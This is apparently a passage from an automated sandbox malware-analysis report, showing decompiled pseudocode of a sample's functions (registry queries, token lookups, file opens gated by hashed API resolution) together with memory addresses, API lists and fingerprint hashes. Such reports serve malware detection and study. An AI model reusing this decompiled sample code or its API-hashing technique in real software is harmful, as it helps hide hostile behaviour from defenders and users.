                                                                                                        0x6e481247
                                                                                                        0x6e48124b
                                                                                                        0x00000000
                                                                                                        0x6e48124b
                                                                                                        0x6e48117b
                                                                                                        0x6e48117f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481191
                                                                                                        0x6e481198
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48119e
                                                                                                        0x6e4811a0
                                                                                                        0x6e4811a1
                                                                                                        0x6e4811a2
                                                                                                        0x6e4811a6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4811bd
                                                                                                        0x6e4811c1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4811ce
                                                                                                        0x6e4811d2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4811d4
                                                                                                        0x6e4811d8
                                                                                                        0x6e481227
                                                                                                        0x6e4811da
                                                                                                        0x6e4811df
                                                                                                        0x6e481222
                                                                                                        0x6e4811e1
                                                                                                        0x6e4811e6
                                                                                                        0x6e48121d
                                                                                                        0x6e4811e8
                                                                                                        0x6e4811ed
                                                                                                        0x6e481218
                                                                                                        0x6e4811ef
                                                                                                        0x6e4811f4
                                                                                                        0x6e481213
                                                                                                        0x6e4811f6
                                                                                                        0x6e4811fb
                                                                                                        0x6e48120e
                                                                                                        0x6e4811fd
                                                                                                        0x6e4811ff
                                                                                                        0x6e481207
                                                                                                        0x6e481207
                                                                                                        0x6e4811fb
                                                                                                        0x6e4811f4
                                                                                                        0x6e4811ed
                                                                                                        0x6e4811e6
                                                                                                        0x6e4811df
                                                                                                        0x6e48122c
                                                                                                        0x6e481236
                                                                                                        0x6e48123b
                                                                                                        0x6e48123b
                                                                                                        0x00000000
                                                                                                        0x6e481240
                                                                                                        0x00000000
                                                                                                        0x6e481120

                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E481118
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E48117B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken
                                                                                                        • String ID:
                                                                                                        • API String ID: 4114910276-0
                                                                                                        • Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                        • Instruction ID: 4de01b9c319052e8ff57d3dc05ed213ec48b45866d86458a51aed4c46ae1088c
                                                                                                        • Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                        • Instruction Fuzzy Hash: 9F41F6702482426AEB59D5FC9C20FEFB7DD9B86300F10882FE570EA394DB64D84AC791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E4857B4, Relevance: 3.1, APIs: 2, Instructions: 74registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E6E4857B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E483064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E47F828(_a8, _t15);
							if(E6E483064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E47F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}











                                                                                                        0x6e4857b8
                                                                                                        0x6e4857b9
                                                                                                        0x6e4857bb
                                                                                                        0x6e4857c0
                                                                                                        0x6e4857c7
                                                                                                        0x6e4857cb
                                                                                                        0x6e4857cb
                                                                                                        0x6e4857cb
                                                                                                        0x6e4857cf
                                                                                                        0x6e485815
                                                                                                        0x6e485815
                                                                                                        0x6e4857d1
                                                                                                        0x6e4857d1
                                                                                                        0x6e4857d7
                                                                                                        0x6e4857e0
                                                                                                        0x6e4857e3
                                                                                                        0x6e4857fa
                                                                                                        0x6e48580b
                                                                                                        0x6e48580b
                                                                                                        0x6e48580d
                                                                                                        0x6e485813
                                                                                                        0x6e48581e
                                                                                                        0x6e485836
                                                                                                        0x6e485856
                                                                                                        0x6e485856
                                                                                                        0x6e485858
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4857d7
                                                                                                        0x6e485860

                                                                                                        APIs
                                                                                                        • RegQueryValueExA.KERNELBASE(?,6E48D1F8,00000000,?,00000000,00000000,?,?,?,6E48D1F8,?,6E485887,?,00000000,00000000), ref: 6E48580B
                                                                                                        • RegQueryValueExA.KERNELBASE(?,6E48D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E48D1F8,?,6E485887,?,00000000), ref: 6E485856
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3660427363-0
                                                                                                        • Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                        • Instruction ID: 446b2a760cef17f97694e805e8c8a44b98025d84de453e9bd46b813738060236
                                                                                                        • Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                        • Instruction Fuzzy Hash: DD11A230609305ABD6109AB59C90EABBBECEF46754F00881FF49597245EB25E800CBB1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485B3C, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E6E485B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E47D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E47D6D0(__ecx, _t60);
					E6E47CFF8(_t56,  *_t60);
					E6E47CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E4862B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E47C26C(_t40);
					if(E6E47C280(_t40) != 0) {
						_t56[2] = E6E4835F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E483064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E483698(_t59, 0xff, 8);
						if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}















                                                                                                        0x6e485b43
                                                                                                        0x6e485b45
                                                                                                        0x6e485b52
                                                                                                        0x6e485b56
                                                                                                        0x6e485b5a
                                                                                                        0x6e485b64
                                                                                                        0x6e485b6b
                                                                                                        0x6e485b6b
                                                                                                        0x6e485b72
                                                                                                        0x6e485b74
                                                                                                        0x6e485b79
                                                                                                        0x6e485b82
                                                                                                        0x6e485b8a
                                                                                                        0x6e485b8a
                                                                                                        0x6e485b7b
                                                                                                        0x6e485b7d
                                                                                                        0x6e485b7d
                                                                                                        0x6e485b79
                                                                                                        0x6e485b8f
                                                                                                        0x6e485b9b
                                                                                                        0x6e485ccc
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c13
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x00000000
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cae
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x00000000
                                                                                                        0x6e485c92
                                                                                                        0x6e485ba1
                                                                                                        0x6e485bb1
                                                                                                        0x6e485bb1

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9dbebfb7a54cab14a975e94cd960e5bb57a61fa96ce671ec4cfea0cef7e91138
                                                                                                        • Instruction ID: 21f857638a473f5641f8409f7ea44f90e676ffe99ae192939085a26bd8f674f2
                                                                                                        • Opcode Fuzzy Hash: 9dbebfb7a54cab14a975e94cd960e5bb57a61fa96ce671ec4cfea0cef7e91138
                                                                                                        • Instruction Fuzzy Hash: 21314930244309BEEB502AF54D84F6B76DDDF81648F00487FFA03A9285DF55D814C6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01181A6A, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 30%
                                                                                                        			_entry_(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _v36;
				long _v40;
				int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr _t30;
				intOrPtr _t31;
				int _t39;
				intOrPtr _t45;
				long _t52;
				long _t54;
				intOrPtr* _t55;

				_t26 = _a4;
				 *_t55 = _t26;
				_v20 = _t26;
				_v24 = L011810B0(__eflags);
				_t28 = E01182084();
				_v28 = _t28;
				if(_t28 != 0) {
					 *_t55 = _v28;
					_t45 =  *((intOrPtr*)(_v20 + 0x48))();
					_t55 = _t55 - 4;
					_v56 = _t45;
				}
				 *_t55 = _v20;
				_t30 = E01182715();
				 *_t55 = _v20;
				_v48 = _t30;
				_t31 = E01181D08(); // executed
				_t52 =  *_v20;
				_t54 =  *((intOrPtr*)(_t52 + 0x3c));
				_t53 = _t54;
				_t46 = _t52;
				_v52 = _t31;
				_v36 = _t52;
				_v32 = _t54;
				_v40 = _t52;
				if(_t54 != 0) {
					_v40 = _v36 + (_v32 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v40 + 0x5c)) != 3) {
					_t39 = FreeConsole(); // executed
					_v44 = _t39;
				}
				 *_t55 = _v20;
				E01182432();
				 *_t55 = _v20; // executed
				E011811ED(_t46, _t53, _t54); // executed
				return 0;
			}


























                                                                                                        0x01181a73
                                                                                                        0x01181a76
                                                                                                        0x01181a79
                                                                                                        0x01181a81
                                                                                                        0x01181a84
                                                                                                        0x01181a8c
                                                                                                        0x01181a8f
                                                                                                        0x01181b21
                                                                                                        0x01181b27
                                                                                                        0x01181b2a
                                                                                                        0x01181b2d
                                                                                                        0x01181b2d
                                                                                                        0x01181ac7
                                                                                                        0x01181aca
                                                                                                        0x01181ad2
                                                                                                        0x01181ad5
                                                                                                        0x01181ad8
                                                                                                        0x01181ae0
                                                                                                        0x01181ae2
                                                                                                        0x01181ae5
                                                                                                        0x01181aec
                                                                                                        0x01181aee
                                                                                                        0x01181af1
                                                                                                        0x01181af4
                                                                                                        0x01181af7
                                                                                                        0x01181afa
                                                                                                        0x01181aab
                                                                                                        0x01181aab
                                                                                                        0x01181ab6
                                                                                                        0x01181abd
                                                                                                        0x01181abf
                                                                                                        0x01181abf
                                                                                                        0x01181b01
                                                                                                        0x01181b04
                                                                                                        0x01181b0c
                                                                                                        0x01181b0f
                                                                                                        0x01181b1d

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleFree
                                                                                                        • String ID:
                                                                                                        • API String ID: 771614528-0
                                                                                                        • Opcode ID: 9b5f9ef63906aacdc26e159bdbc1f01c46337e67137d08610f01acf61f1cdebd
                                                                                                        • Instruction ID: 33e9ad902a4e7c61c2421a54de3c99b8ea9ead6f367136c08d3bfe79c2c42fc0
                                                                                                        • Opcode Fuzzy Hash: 9b5f9ef63906aacdc26e159bdbc1f01c46337e67137d08610f01acf61f1cdebd
                                                                                                        • Instruction Fuzzy Hash: CB21E7B2E0465A9FCB08EFA8D8849AEBBF1FF08304F158429D555A7340E7359841CF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485BE5, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E6E485BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E47C26C(_t24);
					if(E6E47C280(_t24) != 0) {
						_t33[2] = E6E4835F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E483064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E483698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}















                                                                                                        0x6e485be5
                                                                                                        0x6e485be7
                                                                                                        0x6e485bfe
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x6e485cc6
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c72
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c92
                                                                                                        0x6e485c92
                                                                                                        0x6e485be9
                                                                                                        0x6e485be9
                                                                                                        0x6e485bf0
                                                                                                        0x6e485bf0
                                                                                                        0x6e485c9a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                        • Instruction ID: 2b7b4d513b5ef51c9bb19aaffaea41f58cfcc8f32b026300cf3ee869c3434de0
                                                                                                        • Opcode Fuzzy Hash: e18e8a074bc90ceaefeae33184f5781e9a4d35576f6aed19d3443c1852e34b7f
                                                                                                        • Instruction Fuzzy Hash: 17014930284206BEFB512AF54C44F7B778CDF82248F00483BFA0365289DF6AE459C5A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485BBD, Relevance: 1.6, APIs: 1, Instructions: 65fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E6E485BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E47C26C(_t24);
				if(E6E47C280(_t24) != 0) {
					_t34[2] = E6E4835F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E483064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E483698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}
















                                                                                                        0x6e485bbd
                                                                                                        0x6e485bc1
                                                                                                        0x6e485bc4
                                                                                                        0x6e485bc7
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x6e485cc6
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c72
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c92
                                                                                                        0x6e485c92
                                                                                                        0x6e485c9a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                        • Instruction ID: 9b64ba86d569d438e71d6f0825610586b921ddce05dfa613b12a84e88770d9f6
                                                                                                        • Opcode Fuzzy Hash: 8e27c5f9bd282d6c994ea0430aa2a02b23de095639b9ec827df2e67598d971dc
                                                                                                        • Instruction Fuzzy Hash: 7401F93138430ABAFB5126F54D45F7B778CDFC2658F004837FA0265289EF56D855C561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485BD1, Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 45%
                                                                                                        			E6E485BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E483064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E47C26C(_t24);
				if(E6E47C280(_t24) != 0) {
					_t34[2] = E6E4835F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E483064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E483698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E483064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}














                                                                                                        0x6e485bd1
                                                                                                        0x6e485bd8
                                                                                                        0x6e485bdb
                                                                                                        0x6e485c09
                                                                                                        0x6e485c12
                                                                                                        0x6e485c18
                                                                                                        0x6e485c19
                                                                                                        0x6e485c0b
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c0d
                                                                                                        0x6e485c2f
                                                                                                        0x6e485c43
                                                                                                        0x6e485c31
                                                                                                        0x6e485c3e
                                                                                                        0x6e485c40
                                                                                                        0x6e485c40
                                                                                                        0x6e485c45
                                                                                                        0x6e485c4a
                                                                                                        0x6e485c58
                                                                                                        0x6e485cc3
                                                                                                        0x6e485cc6
                                                                                                        0x6e485c5a
                                                                                                        0x6e485c5f
                                                                                                        0x6e485cac
                                                                                                        0x6e485cb0
                                                                                                        0x6e485cba
                                                                                                        0x6e485cba
                                                                                                        0x6e485cb0
                                                                                                        0x6e485c61
                                                                                                        0x6e485c6d
                                                                                                        0x6e485c72
                                                                                                        0x6e485c86
                                                                                                        0x6e485c88
                                                                                                        0x6e485c89
                                                                                                        0x6e485c8a
                                                                                                        0x6e485c8c
                                                                                                        0x6e485c8e
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c8f
                                                                                                        0x6e485c92
                                                                                                        0x6e485c92
                                                                                                        0x6e485c9a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E485C3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                        • Instruction ID: df889f6d755ae685939f71973c30878dd20c8806023e7031b71fef696b4c374e
                                                                                                        • Opcode Fuzzy Hash: dd2ad8cc2bea139498f734a9424d4da058e985a444105aafc8fc825a18545deb
                                                                                                        • Instruction Fuzzy Hash: AE012D3568030A7AFB5166F54D44F7B778DDBC1258F004837FA02652C9EE1AD855C561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E485BB3, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
